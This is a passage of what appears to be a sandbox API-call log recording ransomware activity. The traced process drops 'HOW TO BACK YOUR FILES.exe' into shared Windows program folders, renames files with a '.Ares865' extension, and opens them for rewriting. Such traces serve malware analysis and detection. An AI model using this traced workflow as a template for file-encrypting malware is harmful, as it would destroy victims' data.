lpString1="Web Server Extensions") returned="Web Server Extensions" [0148.072] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0148.072] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x96) returned 0x31afc8 [0148.072] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0148.072] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53531c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Server Extensions", cAlternateFileName="WEBSER~1")) returned 0 [0148.072] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0148.072] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0148.072] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions" [0148.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0148.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0148.072] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions") returned 74 [0148.072] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions" [0148.072] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.072] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.073] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.074] GetLastError () returned 0x0 [0148.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.074] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.074] CloseHandle (hObject=0x120) returned 1 [0148.074] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.074] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.074] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53531c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.074] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.074] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.074] lstrcpyW (in: lpString1=0x2cce496, lpString2="14" | out: lpString1="14") returned="14" [0148.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0148.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9c) returned 0x320fc8 [0148.074] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0148.074] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53531c20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0148.074] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0148.074] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53531c20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0148.075] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0148.075] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0148.075] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14" [0148.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0148.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0148.075] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14") returned 77 [0148.075] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14" [0148.075] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.075] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.076] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.076] GetLastError () returned 0x0 [0148.076] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.076] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.076] CloseHandle (hObject=0x120) returned 1 [0148.076] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.076] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.076] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53531c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.076] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.076] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.077] lstrcpyW (in: lpString1=0x2cce49c, lpString2="BIN" | out: lpString1="BIN") returned="BIN" [0148.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0148.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa4) returned 0x2f2fc8 [0148.077] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0148.077] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53531c20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0148.077] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0148.077] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53531c20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0148.077] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0148.077] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0148.077] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN" [0148.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0148.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0148.077] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN") returned 81 [0148.077] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN" [0148.077] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.077] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.078] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.078] GetLastError () returned 0x0 [0148.078] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.078] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.078] CloseHandle (hObject=0x120) returned 1 [0148.079] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.079] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.079] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21a6a110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53531c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53531c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.079] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.079] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.079] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="FPSRVUTL.DLL" | out: lpString1="FPSRVUTL.DLL") returned="FPSRVUTL.DLL" [0148.079] lstrlenW (lpString="FPSRVUTL.DLL") returned 12 [0148.079] lstrlenW (lpString="Ares865") returned 7 [0148.079] lstrcmpiW (lpString1="UTL.DLL", lpString2="Ares865") returned 1 [0148.079] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.Ares865") returned 102 [0148.079] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.ares865"), dwFlags=0x1) returned 1 [0148.081] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.081] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1651576) returned 1 [0148.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.081] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.167] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="FPWEC.DLL" | out: lpString1="FPWEC.DLL") returned="FPWEC.DLL" [0148.167] lstrlenW (lpString="FPWEC.DLL") returned 9 [0148.167] lstrlenW (lpString="Ares865") returned 7 [0148.167] lstrcmpiW (lpString1="WEC.DLL", lpString2="Ares865") returned 1 [0148.167] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.Ares865") returned 99 [0148.167] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll.ares865"), dwFlags=0x1) returned 1 [0148.171] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPWEC.DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpwec.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.171] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=983952) returned 1 [0148.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0148.223] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO" [0148.223] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1b08 | out: hHeap=0x2b0000) returned 1 [0148.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0148.224] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO") returned 57 [0148.224] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO" [0148.224] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.224] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.225] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.226] GetLastError () returned 0x0 [0148.226] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.226] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.226] CloseHandle (hObject=0x120) returned 1 [0148.226] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.226] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.226] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274de510, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53557d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53557d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.226] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.226] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.227] lstrcpyW (in: lpString1=0x2cce474, lpString2="10.0" | out: lpString1="10.0") returned="10.0" [0148.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0148.227] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7e) returned 0x2f02f8 [0148.227] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0148.227] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0a6ab00, ftCreationTime.dwHighDateTime=0x1cacb2a, ftLastAccessTime.dwLowDateTime=0x5e9eb8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf0a6ab00, ftLastWriteTime.dwHighDateTime=0x1cacb2a, nFileSizeHigh=0x0, nFileSizeLow=0x87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ActionsPane3.xsd", cAlternateFileName="ACTION~1.XSD")) returned 1 [0148.227] lstrcmpiW (lpString1="ActionsPane3.xsd", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.227] lstrcmpiW (lpString1="ActionsPane3.xsd", lpString2="aoldtz.exe") returned -1 [0148.227] lstrcpyW (in: lpString1=0x2cce474, lpString2="ActionsPane3.xsd" | out: lpString1="ActionsPane3.xsd") returned="ActionsPane3.xsd" [0148.227] lstrlenW (lpString="ActionsPane3.xsd") returned 16 [0148.227] lstrlenW (lpString="Ares865") returned 7 [0148.227] lstrcmpiW (lpString1="ne3.xsd", lpString2="Ares865") returned 1 [0148.227] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd.Ares865") returned 82 [0148.227] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\actionspane3.xsd"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\actionspane3.xsd.ares865"), dwFlags=0x1) returned 1 [0148.230] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\actionspane3.xsd.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.230] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=135) returned 1 [0148.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.234] lstrcpyW (in: lpString1=0x2cce474, lpString2="vstoee.dll" | out: lpString1="vstoee.dll") returned="vstoee.dll" [0148.234] lstrlenW (lpString="vstoee.dll") returned 10 [0148.234] lstrlenW (lpString="Ares865") returned 7 [0148.234] lstrcmpiW (lpString1="oee.dll", lpString2="Ares865") returned 1 [0148.234] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.Ares865") returned 76 [0148.234] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee.dll.ares865"), dwFlags=0x1) returned 1 [0148.237] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.237] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=125256) returned 1 [0148.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.237] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.249] lstrcpyW (in: lpString1=0x2cce474, lpString2="vstoee100.tlb" | out: lpString1="vstoee100.tlb") 